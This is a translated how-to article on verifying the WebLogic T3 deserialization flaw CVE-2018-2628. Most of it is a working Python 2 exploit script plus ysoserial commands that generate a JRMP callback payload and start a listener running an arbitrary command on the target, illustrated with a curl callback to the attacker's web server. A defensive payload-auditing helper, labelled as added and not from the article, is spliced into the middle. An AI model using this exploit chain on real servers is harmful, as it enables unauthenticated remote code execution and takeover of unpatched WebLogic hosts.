How to verify the vulnerability of WebLogic CVE-2018-2628

2025-01-19 Update. From: SLTechnology News&Howtos (shulou), Network Security

Shulou(Shulou.com)05/31 Report--

Today I will walk through how to verify the WebLogic CVE-2018-2628 vulnerability. Many readers may not know much about it, so I have summarized the following; I hope you get something useful from it.

1. Summary of the vulnerability

In the early morning of April 18, Beijing time, Oracle released its April Critical Patch Update (CPU), which includes a high-risk WebLogic deserialization vulnerability (CVE-2018-2628) that allows unauthenticated remote code execution. An attacker only needs to send specially crafted T3 protocol data to the server to obtain its privileges, and can then take control of the component and compromise the availability, confidentiality and integrity of its data.

2. Affected versions

The following versions are affected:

Oracle WebLogic Server 10.3.6.0
Oracle WebLogic Server 12.1.3.0
Oracle WebLogic Server 12.2.1.2
Oracle WebLogic Server 12.2.1.3

3. Current state of public verification code

At present there are many verification scripts for this vulnerability on GitHub, but most of them embed in the PAYLOAD field an IP address belonging to a host in the United States, 104.251.228.50, as decoding the field shows:

In [2]: PAYLOAD = ['aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72...
   ...: 787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c...
   ...: 6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a617661...
   ...: 0000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e..
   ...: 03000078707737000a556e6963617374526566000e3130342e3235312e3232382e353000001b590000000001eea9.
   ...: 0b00000000000000000000000000000000000000000000000000000078']

In [3]: PAYLOAD[0].decode('hex')
Out[3]: "\xac\xed\x00\x05s}\x00\x00\x1djava.rmi.activation.Activatorxr\x00\x17java.lang.reflect.Proxy\xe1'\xda\xcc\x10C\xcb\x02\x00\x01L\x00\x01ht\x00%Ljava/lang/reflect/InvocationHandler;xpsr\x00-java.rmi.server.RemoteObjectInvocationHandler\x00\x02\x00\x00xr\x00\x1cjava.rmi.server.RemoteObject\xb4\x91\x0ca3\x03\x00xpw7\x00\nUnicastRef\x00\x0e104.251.228.50\x00\x1bY\x00\x00\x01\xee\xa9\x00\x00..."

4. My vulnerability verification

Because of this, I set up a lab environment to test the vulnerability myself, and I share the experience here (every IP address involved in the test is a lab address).

4.1 Vulnerability verification code

First, here is my code. It is single-threaded sample code only; readers who need multi-threading can adapt it themselves.

# coding: utf-8
# Python 2 script: it relies on str.decode('hex') and the print statement.
import re
import sys
import socket
from time import sleep

VUL = ['CVE-2018-2628']

# The callback address embedded in PAYLOAD must be your own listener; here it is 11.10.67.83.
PAYLOAD = ['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']

# A vulnerable server answers with a java.lang.reflect.Proxy class name such as $Proxy12.
VER_SIG = [r'\$Proxy[0-9]+']


def t3handshake(sock, server_addr):
    # The hex below is the T3 client hello "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\n\n".
    sock.connect(server_addr)
    sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
    sleep(1)
    sock.recv(1024)
    sys.stdout.write('handshake successful\n')


def buildT3RequestObject(sock, dport):
    # The destination port is patched into data2 as a 4-digit hex string.
    data1 = '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'
    data2 = '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{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(dport))
    data3 = '1a7727000d3234322e323134'
    data4 = '2e312e32353461863d1d00000078'
    for d in [data1, data2, data3, data4]:
        sock.send(d.decode('hex'))
    sleep(2)
    sys.stdout.write('send request payload successful,recv length:%d\n' % (len(sock.recv(2048))))


def sendEvilObjData(sock, data):
    # Wrap the serialized object in the T3 message framing and prefix the total length.
    payload = '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'
    payload += data
    payload += 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
    payload = '%s%s' % ('{:08x}'.format(len(payload) / 2 + 4), payload)
    sock.send(payload.decode('hex'))
    sleep(2)
    sock.send(payload.decode('hex'))
    res = ''
    try:
        # Read until the socket times out (see the timeout set in run()).
        while True:
            res += sock.recv(4096)
            sleep(0.1)
    except Exception as e:
        pass
    return res


def checkVul(res, server_addr, index):
    p = re.findall(VER_SIG[index], res, re.S)
    if len(p) > 0:
        return '[+] {}:{} is vul {}'.format(server_addr[0], server_addr[1], VUL[index])
    else:
        return '[-] {}:{} is not vul {}'.format(server_addr[0], server_addr[1], VUL[index])


def run(*args):
    dip = args[0]
    dport = args[1]
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # A patched server blocks instead of answering, so set a timeout (15 s by default; adjust as needed).
    sock.settimeout(15)
    server_addr = (dip, dport)
    t3handshake(sock, server_addr)
    buildT3RequestObject(sock, dport)
    rs = sendEvilObjData(sock, PAYLOAD[index])
    print checkVul(rs, server_addr, index)


def single():
    dip = sys.argv[1]
    dport = int(sys.argv[2])
    run(dip, dport)


if __name__ == '__main__':
    index = 0
    single()

4.2 Modifying the PAYLOAD field

To change the address embedded in the PAYLOAD field of the code, generate the payload for your own listener with ysoserial:

$ java -jar ysoserial-master.jar JRMPClient 11.10.67.83:1099 | xxd

00000000: aced 0005 737d 0000 0001 001a 6a61 7661  ....s}......java
00000010: 2e72 6d69 2e72 6567 6973 7472 792e 5265  .rmi.registry.Re
00000020: 6769 7374 7279 7872 0017 6a61 7661 2e6c  gistryxr..java.l
00000030: 616e 672e 7265 666c 6563 742e 5072 6f78  ang.reflect.Prox
00000040: 79e1 27da 20cc 1043 cb02 0001 4c00 0168  y.'. ..C....L..h
00000050: 7400 254c 6a61 7661 2f6c 616e 672f 7265  t.%Ljava/lang/re
00000060: 666c 6563 742f 496e 766f 6361 7469 6f6e  flect/Invocation
00000070: 4861 6e64 6c65 723b 7870 7372 002d 6a61  Handler;xpsr.-ja
00000080: 7661 2e72 6d69 2e73 6572 7665 722e 5265  va.rmi.server.Re
00000090: 6d6f 7465 4f62 6a65 6374 496e 766f 6361  moteObjectInvoca
000000a0: 7469 6f6e 4861 6e64 6c65 7200 0000 0000  tionHandler.....
000000b0: 0000 0202 0000 7872 001c 6a61 7661 2e72  ......xr..java.r
000000c0: 6d69 2e73 6572 7665 722e 5265 6d6f 7465  mi.server.Remote
000000d0: 4f62 6a65 6374 d361 b491 0c61 331e 0300  Object.a...a3...
000000e0: 0078 7077 3400 0a55 6e69 6361 7374 5265  .xpw4..UnicastRe
000000f0: 6600 0b31 312e 3130 2e36 372e 3833 0000  f..11.10.67.83..
00000100: 044b ffff ffff c56f 9b74 0000 0000 0000  .K....o.t.......
00000110: 0000 0000 0000 0078                      .......x

Note that ysoserial requires a JDK. Running the command above yields your own PAYLOAD (the one generated for 11.10.67.83 is shown below); use it to replace the PAYLOAD content in the code:

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
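Section 3 showed public scripts whose PAYLOAD points at 104.251.228.50, and section 4.2 replaces that address with your own listener. The following Python 3 helper is an added example, not code from the article or from the PoC's author: it decodes a PAYLOAD hex string, parses the UnicastRef inside the serialized java.rmi stub and reports which host and port the tested server would be made to connect to, so a PoC can be audited before it is run; it also recognises the T3 client hello from the handshake, the byte pattern a network sensor would key on. The sample fragments are the two UnicastRef snippets quoted on this page, wrapped in a constructed stream header (they are not complete payloads).

```python
import re
import struct

# The T3 client hello sent by the PoC: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\n\n".
T3_HELLO = re.compile(rb"^t3 \d+\.\d+(\.\d+)*\nAS:\d+\nHL:\d+\nMS:\d+\n\n")
JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"      # Java serialization stream magic + version
UNICAST_REF = b"\x00\x0aUnicastRef"          # UTF length (10) followed by "UnicastRef"


def is_t3_hello(data):
    """True if a captured client message is the T3 handshake used by the PoC."""
    return T3_HELLO.match(data) is not None


def parse_unicast_ref(blob):
    """Return (host, port) from the UnicastRef in a serialized java.rmi stub, else None."""
    i = blob.find(UNICAST_REF)
    if i < 0:
        return None
    p = i + len(UNICAST_REF)
    if p + 2 > len(blob):
        return None
    (hlen,) = struct.unpack(">H", blob[p:p + 2])   # host: 2-byte length + UTF-8 bytes
    host = blob[p + 2:p + 2 + hlen]
    p += 2 + hlen
    if len(host) != hlen or p + 4 > len(blob):
        return None
    (port,) = struct.unpack(">i", blob[p:p + 4])   # port: big-endian Java int
    return host.decode("ascii", "replace"), port


def audit_payload_hex(hex_payload, trusted_hosts):
    """Classify a PoC PAYLOAD string: 'no-serialized-object', 'no-callback',
    'callback-trusted' or 'callback-untrusted:<host>:<port>'."""
    blob = bytes.fromhex(hex_payload)
    if JAVA_SERIAL_MAGIC not in blob:
        return "no-serialized-object"
    ref = parse_unicast_ref(blob)
    if ref is None:
        return "no-callback"
    host, port = ref
    return "callback-trusted" if host in trusted_hosts else "callback-untrusted:%s:%d" % (host, port)


# Constructed samples: stream header + TC_BLOCKDATA + the UnicastRef fragments from this page.
PUBLIC_POC_FRAGMENT = "aced0005" + "7737000a556e6963617374526566" + "000e" + "3130342e3235312e3232382e3530" + "00001b59"
LAB_FRAGMENT = "aced0005" + "7734000a556e6963617374526566" + "000b" + "31312e31302e36372e3833" + "0000044b"

if __name__ == "__main__":
    for name, frag in [("public PoC", PUBLIC_POC_FRAGMENT), ("lab payload", LAB_FRAGMENT)]:
        print(name, "->", audit_payload_hex(frag, {"11.10.67.83"}))
```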

4.3 Vulnerability verification

Start a JRMPListener with ysoserial on the listening host; the command to be executed on the target is passed as the last argument:

java -cp ysoserial-master.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 "Command"

Once that listener is running, the test proper can begin. To confirm that the vulnerability really gives remote code execution, take a Linux server with WebLogic installed as the target and make the command a curl request to a web server you control; if the web server's access log then shows a request from the target's IP address, the vulnerability has been exploited successfully. The result of my verification follows. The attack machine in this test is 11.10.67.83 (a lab private IP), and both the JRMPListener and the web service run on it.

The target machine is 11.10.138.61 (a lab private IP).

Run the following command on the attack machine against the target 11.10.138.61:

python test.py 11.10.138.61 7001

Output shown on the attack machine 11.10.67.83:

Corresponding entry in the web log on 11.10.67.83:

This shows that the vulnerability caused the target machine 11.10.138.61 to access the web service on the attack machine 11.10.67.83.

The experiment above shows that this vulnerability does give remote code execution. Security and operations staff should take it seriously and fix it as soon as possible: Oracle has released an official patch, and affected users are strongly advised to upgrade and apply it without delay.
